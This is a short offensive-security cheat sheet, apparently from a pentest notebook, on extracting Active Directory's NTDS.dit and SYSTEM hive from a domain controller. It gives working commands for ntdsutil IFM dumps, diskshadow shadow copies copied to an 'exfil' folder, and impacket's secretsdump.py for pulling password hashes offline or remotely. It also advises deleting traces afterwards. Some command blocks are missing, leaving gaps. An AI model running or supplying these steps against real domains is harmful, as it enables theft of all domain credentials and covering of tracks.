Get the NTDS file using ntdsutil.exe → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
Find the secretsdump.py script from impacket. (will be at /usr/share/doc/python3-impacket/examples/ )
python secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile clientntds -hashes LMHASH:NTHASH -user-status LOCAL
Clean up the hashes using grep and cut, or whatever you want, such that the output only shows the domain users that are enabled. Something along the lines of
Make sure you clean up everything (delete shadow file, and ntds and system)
No Credentials - ntdsutil
If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:
We can then dump password hashes offline with impacket:
No Credentials - diskshadow
On Windows Server 2008+, we can use diskshadow to grab the ntdis.dit.
Create a shadowdisk.exe script instructing to create a new shadow disk copy of the disk C (where ntds.dit is located in our case) and expose it as drive Z:\
shadow.txt
...and now execute the following:
Below shows the ntds.dit got etracted and placed into our c:\exfil folder:
Inside interactive diskshadow utility, clean up the shadow volume:
With Credentials
If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:
